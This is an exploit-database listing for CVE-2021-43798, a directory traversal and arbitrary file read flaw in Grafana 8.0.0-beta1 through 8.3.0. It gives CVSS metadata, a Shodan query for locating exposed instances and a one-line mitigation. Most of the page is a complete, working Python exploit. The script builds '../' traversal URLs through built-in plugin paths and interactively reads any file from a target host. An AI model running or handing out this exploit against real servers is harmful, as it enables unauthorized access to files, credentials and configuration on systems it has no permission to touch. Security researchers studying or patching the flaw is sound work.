header-logo
Suggest Exploit
vendor:
Grafana
by:
s1gh
8.8
CVSS
HIGH
Directory Traversal and Arbitrary File Read
22
CWE
Product Name: Grafana
Affected Version From: V8.0.0-beta1
Affected Version To: V8.3.0
Patch Exists: YES
Related CWE: CVE-2021-43798
CPE: a:grafana:grafana
Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2021-43798/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2021-43798/
Other Scripts:
Tags: packetstorm,cve,cve2021,grafana,lfi
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47phttps://nosec.org/home/detail/4914.htmlhttps://github.com/jas502n/Grafana-VulnTipshttps://nvd.nist.gov/vuln/detail/CVE-2021-43798http://packetstormsecurity.com/files/165198/Grafana-Arbitrary-File-Reading.html
Nuclei Metadata: {'max-request': 3, 'verified': 'true', 'shodan-query': 'title:"Grafana"', 'vendor': 'grafana', 'product': 'grafana'}
Platforms Tested: Debian 10
2021

Grafana 8.3.0 – Directory Traversal and Arbitrary File Read

Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.

Mitigation:

Upgrade to Grafana 8.3.1 or later
Source

Exploit-DB raw data:

# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
# Date: 08/12/2021
# Exploit Author: s1gh
# Vendor Homepage: https://grafana.com/
# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
# Version: V8.0.0-beta1 through V8.3.0
# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
# CVE: CVE-2021-43798
# Tested on: Debian 10
# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
import argparse
import sys
from random import choice

plugin_list = [
    "alertlist",
    "annolist",
    "barchart",
    "bargauge",
    "candlestick",
    "cloudwatch",
    "dashlist",
    "elasticsearch",
    "gauge",
    "geomap",
    "gettingstarted",
    "grafana-azure-monitor-datasource",
    "graph",
    "heatmap",
    "histogram",
    "influxdb",
    "jaeger",
    "logs",
    "loki",
    "mssql",
    "mysql",
    "news",
    "nodeGraph",
    "opentsdb",
    "piechart",
    "pluginlist",
    "postgres",
    "prometheus",
    "stackdriver",
    "stat",
    "state-timeline",
    "status-histor",
    "table",
    "table-old",
    "tempo",
    "testdata",
    "text",
    "timeseries",
    "welcome",
    "zipkin"
]

def exploit(args):
    s = requests.Session()
    headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }

    while True:
        file_to_read = input('Read file > ')

        try:
            url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
            req = requests.Request(method='GET', url=url, headers=headers)
            prep = req.prepare()
            prep.url = url
            r = s.send(prep, verify=False, timeout=3)

            if 'Plugin file not found' in r.text:
                print('[-] File not found\n')
            else:
                if r.status_code == 200:
                    print(r.text)
                else:
                    print('[-] Something went wrong.')
                    return
        except requests.exceptions.ConnectTimeout:
            print('[-] Request timed out. Please check your host settings.\n')
            return
        except Exception:
            pass

def main():
    parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
    parser.add_argument('-H',dest='host',required=True, help="Target host")
    args = parser.parse_args()

    try:
        exploit(args)
    except KeyboardInterrupt:
        return


if __name__ == '__main__':
    main()
    sys.exit(0)

Navigation

Suggest Exploit

Services By CQR